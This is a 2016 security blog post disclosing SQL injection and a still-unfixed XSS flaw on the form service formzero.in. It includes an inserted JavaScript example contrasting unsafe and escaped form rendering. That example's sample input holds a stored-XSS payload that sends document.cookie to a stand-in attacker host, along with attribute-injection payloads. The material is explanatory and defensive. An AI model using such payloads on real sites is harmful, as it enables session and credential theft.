Friday, June 17, 2016

FormZero.in - SQL Injection & XSS Vulnerable

XSS Vulnerability in formzero.in

Proof of concept for formzero.in: SQL Injection (fixed) & XSS (not fixed)

 
In the last few months I have discovered and reported a lot of bugs on many different websites. Last month I posted about the askmebazaar.com bug, and this month I am sharing my experience with formzero.in, an Indian company which provides an easy-to-use online form system (similar to Google Forms) to institutes, universities, companies and schools.


Note: Being a responsible software engineer/security researcher, I reported the issues to Form Zero. They fixed the SQL Injection but not the XSS.
 
What was the security flaw?
The first flaw was SQL Injection. They told me that they were debugging and upgrading their (live) systems, that I got access to their databases because of a mistake on their side during that work, and that it was not a flaw in their system. Well, first of all: come on guys, seriously? Google updates and maintains its systems on a daily basis, so Google must get SQL injected every day, right? Second, I checked their systems for 4 days after I reported the flaw and the SQL Injection point was still there, and I don't think maintenance goes on for 4 days, not even in big companies. Anyway, here are some screenshots of the flaw, which they eventually (over that 4-day period) figured out and fixed, just so they could deny any attack.
Database of Form Zero
This is their file which was online during the debugging period. Still online, thanks to Google Cache :D
As you can see, their internal file was visible on Google Search and it gave access to a lot of things.

The second flaw is XSS. As you can see in the first picture at the top, I could write a whole HTML form, and not just that: I could run scripts, HTML and other malicious code, or I could simply send this page with the edited HTML to any of their clients and get access to their emails and passwords. A major issue, but according to one of their employees (a developer), XSS is not a big deal. Well, to answer that: Google pays $7,500 for an XSS bug. Might not be a big deal XD. It has been a month of me emailing them to fix this XSS bug, and all I have got in response is that they are short on money, going through investment rounds, cannot pay me, and do not have a bug bounty program; now they do not reply at all. Nice way to thank a cyber security consultant who informed you about a flaw in your website.

XSS Vulnerable

What have we learned?
First, do not debug live systems so carelessly that you expose your system files and open injection points.
It is not someone else's mistake that you left the door open for others to enter your house.
Second, XSS is a big deal. Do not underestimate it. Google is not stupid enough to waste $7,500.
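To make the second point concrete, here is an added example (not FormZero's code and not from the original post) of the bug class described above: a form builder that inserts the form creator's field label, input type and placeholder straight into HTML lets that creator run script in every respondent's browser, while the same renderer with output encoding and an allow-listed input type turns the payload into inert text. The field names, the renderer functions and the attacker host are illustrative assumptions.

```javascript
// Added example, not FormZero's code: a toy "form builder" renderer that
// turns a field definition supplied by the form's creator into HTML.
// renderFieldUnsafe() interpolates the strings raw, which is the stored-XSS
// pattern; renderFieldSafe() entity-encodes every untrusted string and
// allow-lists the input type. Field names and the attacker host are assumed.

// Entity-encode a string for use in HTML text nodes and double-quoted attributes.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Input types the builder is allowed to emit (assumed for the example).
const ALLOWED_TYPES = new Set(["text", "email", "number", "checkbox"]);

// Vulnerable renderer: creator-controlled label, type, name and placeholder
// land in the page exactly as typed, so <img onerror=...> or an attribute
// break-out runs in every respondent's browser.
function renderFieldUnsafe(field) {
  return (
    `<label>${field.label}` +
    `<input type="${field.type}" name="${field.name}" placeholder="${field.placeholder}">` +
    `</label>`
  );
}

// Hardened renderer: encode at the point of output for the context each
// value lands in, and never let the creator supply an arbitrary value for
// something with a small fixed vocabulary like the input type.
function renderFieldSafe(field) {
  const type = ALLOWED_TYPES.has(field.type) ? field.type : "text";
  return (
    `<label>${escapeHtml(field.label)}` +
    `<input type="${type}" name="${escapeHtml(field.name)}" placeholder="${escapeHtml(field.placeholder)}">` +
    `</label>`
  );
}

// Count opening tags in rendered markup: a cheap way to see whether the
// creator managed to introduce elements the renderer never intended.
function countTags(html) {
  const matches = html.match(/<[a-zA-Z]/g);
  return matches ? matches.length : 0;
}

// Constructed attacker input: a field definition as a malicious form creator
// would submit it. attacker.example is a placeholder, not a real host.
const maliciousField = {
  label: 'Email <img src=x onerror="fetch(\'https://attacker.example/?c=\' + document.cookie)">',
  type: 'text" autofocus onfocus="alert(document.domain)',
  name: "email",
  placeholder: '" onmouseover="alert(1)',
};

// Demo: three tags (label, img, input) come out of the unsafe renderer, two
// out of the safe one, and the injected handlers survive only as inert text.
function demo() {
  const unsafe = renderFieldUnsafe(maliciousField);
  const safe = renderFieldSafe(maliciousField);
  console.log("unsafe tags:", countTags(unsafe), "\n", unsafe);
  console.log("safe tags:  ", countTags(safe), "\n", safe);
  return { unsafe, safe };
}

demo();
```

Encoding on output, per context, is the fix; stripping "dangerous" strings on input is not, because the same label may later be rendered into an attribute, a script block or an email template where a different encoding applies.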

Third, learn to respect cyber security professionals. Just as you want to get paid and praised for your services, skills and time, we want that too.

I have been emailing formzero.in for more than a month now. I haven't got any response from these guys in regard to fixing the bugs on their site. I have emailed them over 15 times. I don't think that they will fix it. I would advise the users of this site to be cautious and secure their accounts on their own.


You can hire me for full-time/freelance custom software/web development, security analysis and graphic design work.

Follow me on @MRKN_Destroy
Email me at : hey24sheep@gmail.com.

Check out my wonderful FREE app for the deaf and mute:
Text Is Speech and Text Is Speech Pro -- (Search for "NEETTECH")
Android: https://goo.gl/iqF4nW
Windows : https://goo.gl/jOf6sX
Windows (Pro Version- Paid) : https://goo.gl/e1l637
